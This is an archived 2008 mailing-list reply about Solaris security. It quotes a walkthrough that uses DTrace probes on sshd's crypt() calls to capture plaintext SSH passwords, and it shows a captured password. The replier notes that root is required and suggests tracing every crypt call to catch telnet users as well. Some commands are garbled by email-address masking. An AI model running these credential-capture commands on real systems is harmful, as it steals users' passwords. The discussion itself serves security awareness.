On 7 Jan 2008, at 14:37, UNIX admin wrote:

>> Really, I don't know how someone would hack a Solaris
>> box.
> How about this scenario: you discover a zero day exploit in SSH,  
> make your cd00r.c and the service it spawns invisible, but you don't  
> stop there.

AFAIK cd00r.c and dtrace need root privs, I your hacker has obtained  
root privs you are screwed anyway...

> Instead, you do some further DTrace to obtain SSH passwords from any  
> users logging into the system via SSH:
> ssh
> The authenticity of host ' (' can't be established.
> RSA key fingerprint is af:2a:b8:8b:ad:d8:55:26:02:fb:28:8b: 
> 86:04:d6:3f.
> Are you sure you want to continue connecting (yes/no)? yes
> Warning: Permanently added '' (RSA) to the list of known  
> hosts.
> Password:
> Since you're already on the system, in another window, you look up  
> the PID of the SSH server:
> ps -ef | grep sshd
>    root   352     1   0 11:20:45 ?           0:00 /usr/lib/ssh/sshd
>    root  8287   352   0 13:21:55 ?           0:00 /usr/lib/ssh/sshd
>    root  8295  8241   0 13:22:46 pts/5       0:00 grep sshd
> Since we know that sshd(1M) spawns a new child process for every new  
> connection, it's not PID 352 for sure. So it must be PID 8287, since  
> PIDs are incremented sequentially.
> Let's use this knowledge. Using the DTrace pid provider in another  
> window, let's monitor all the entry probes for PID 8287:
> su -
> Password:

And where did the hacker get this password from ?

> dtrace -n 'pid8287:::entry [EMAIL PROTECTED] =  
> count();}'
> dtrace: description 'pid8297:::entry ' matched 18889 probes
> 18889 probes! Ouch. Analysis on which function does the SSH decrypt  
> could take years; so obviously, we'll have to use our brains a  
> little, instead of slaving away like a monkey behind a keyboard.  
> Let's fudge up the password, twice, and narrow the results:
> ssh
> Password:
> Password:
> Let's see what happens in the other window in the meanwhile:
> dtrace -n 'pid8297:::entry [EMAIL PROTECTED] =  
> count();}'
> dtrace: description 'pid8297:::entry ' matched 18889 probes
> ^C
>  _free_config                                                      1

... quite a few lines of dtrace output deleted.

> So let's think about this a little further. What do we know about  
> "run o' the mill" passwd authentication?
> Passwords are stored in /etc/shadow. In crypt(1) format, unless PAM  
> authentication is used, or passwd encryption isn't reconfigured  
> (Solaris has a way to do this, see http://docs.sun.com/). Therefore,  
> it's highly likely, following this line of logic, that SSH after  
> decryption "off of the wire" must call crypt(1) to compare the  
> results with what is in /etc/shadow.
> The only "problem" at this point is that we don't know in which argv  
> the passwd argument will be sent to crypt(). Fortunately, UNIX(R)  
> loves us, since the manual tells us so:
> man -s 3C crypt
> Standard C Library Functions                            crypt(3C)
>     crypt - string encoding function
>     #include <crypt.h>
>     char *crypt(const char *key, const char *salt);
> The first argument, arg0, will be a pointer to a char array! So:
> dtrace -n 'pid8412::crypt:entry {printf("%s\n", copyinstr(arg0));}'
> dtrace: description 'pid8412::crypt:entry ' matched 1 probe
> CPU     ID                    FUNCTION:NAME
>  0  41288                      crypt:entry juhu-hu
Why limit this to only one pid ? Just have it trigger on all crypts  
and you might even get some telnet users.....

> BUSTED! Another one bites the dust.
> I hope, by the end of reading this *trivial* example, that you're at  
> least a little concerned about how easy it is to break into a  
> Solaris box. I just wanted to point out that, although Solaris is  
> much, much more secure and resistant to attacks when compared to  
> other operating systems, depending on who you're dealing with,  
> breaking into your "secure" Solaris box is a walk in the park. Don't  
> be lulled by a false sense of security.

Trivial if you have root ( or the required dtrace privileges),  
probably a lot harder without them.


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